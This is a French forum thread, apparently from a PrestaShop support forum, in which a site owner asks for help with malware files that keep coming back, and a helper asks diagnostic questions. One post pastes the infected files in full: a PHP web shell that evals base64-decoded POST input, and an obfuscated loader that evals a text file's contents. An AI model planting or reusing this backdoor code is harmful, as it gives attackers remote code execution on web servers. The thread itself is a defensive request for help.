Nouvelle attaque ?

Reply to Nouvelle attaque ? on Mon, 28 Oct 2024 20:15:25 GMT

herve_02 — Mon, 28 Oct 2024 20:15:25 GMT

eval/Designed with utility, safety and style/($table_prefix($wp_content));

Cela ressemble pas mal à une attaque pour wordpress.

Reply to Nouvelle attaque ? on Mon, 20 Nov 2023 19:40:43 GMT

eolia — Mon, 20 Nov 2023 19:40:43 GMT

Par contre il faut comprendre les limites du système.
La version 1.7 c'est plus d'un million de lignes de code (contre 300 000 pour les 1.6) et cleaner ne peut pas scanner tous les fichiers/répertoires surtout que j'ai arrêté de suivre leurs évolutions.
Un autre élément à contrôler: pas d'autres CMS sur le même hébergement (WordPress ou autre) ni de répertoires inconnus (créés par vous et non-scannés) ?

Reply to Nouvelle attaque ? on Mon, 20 Nov 2023 19:37:15 GMT

RPro — Mon, 20 Nov 2023 19:37:15 GMT

J'ai oublié : j'ai passé cleaner.php après avoir supprimé les fichiers ...
Cela ne change rien dans les faits car ils reviennent ce qui signifie que l'infection vient d'un autre fichier ou d'une faille qui, lui /elle n'a pas été détecté ...

Reply to Nouvelle attaque ? on Mon, 20 Nov 2023 18:46:55 GMT

eolia — Mon, 20 Nov 2023 18:46:55 GMT

Bah je ne comprends pas que Cleaner ne les trouve pas avec de telles fonctions à l'intérieur. (eval() par exemple)

Reply to Nouvelle attaque ? on Mon, 20 Nov 2023 16:58:52 GMT

RPro — Mon, 20 Nov 2023 16:58:52 GMT

Le fichier 1.mcm.x86_64 est trop long pour être transmis tel quel.
Le fichier confcom.php est vide
Le fichier conf.php est le suivant :

PHP command

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$php = $_POST['php'];
$php = strtr($php, '-', '=');
$php = base64_decode($php);
if($php) {
$result = eval($php);
echo $result;
}
}
?>

Le fichier lowpr.php est le suivant :
$table_prefix = "wbzaxsye6w4_duevcwondme";
$table_prefix = str_replace(array("z", "x", "y", "u", "v", "w", "n", "m"), "", $table_prefix);
$txt_contents = "1f2i3l4e5_6g7e8t9_0c1o2n3t4e5n6t7s8";
$txt_contents = preg_replace("/\d+/", "", $txt_contents);
$wp_content = $txt_contents("lowpr".".txt");
eval/Designed with utility, safety and style/($table_prefix($wp_content));
?>

J'espère que cela vous donnera des idées car je suis pas compétent !
Merci par avance

Reply to Nouvelle attaque ? on Mon, 20 Nov 2023 16:50:47 GMT

eolia — Mon, 20 Nov 2023 16:50:47 GMT

il y a quoi dans les fichiers que vous avez supprimé ?

Reply to Nouvelle attaque ? on Mon, 20 Nov 2023 16:49:10 GMT

RPro — Mon, 20 Nov 2023 16:49:10 GMT

Non !
Il y a bien des alertes de modification mais après vérification, c'est normal.
Aucune modification en rouge.

Reply to Nouvelle attaque ? on Mon, 20 Nov 2023 16:46:48 GMT

eolia — Mon, 20 Nov 2023 16:46:48 GMT

Avant que vous ne supprimiez quoi que ce soit, Cleaner ne trouve rien ?

Reply to Nouvelle attaque ? on Mon, 20 Nov 2023 16:04:13 GMT

RPro — Mon, 20 Nov 2023 16:04:13 GMT

Désolé pour l'oubli : il s'agit de 1.7.2.4

Reply to Nouvelle attaque ? on Mon, 20 Nov 2023 16:02:24 GMT

eolia — Mon, 20 Nov 2023 16:02:24 GMT

Quelle version de Presta ?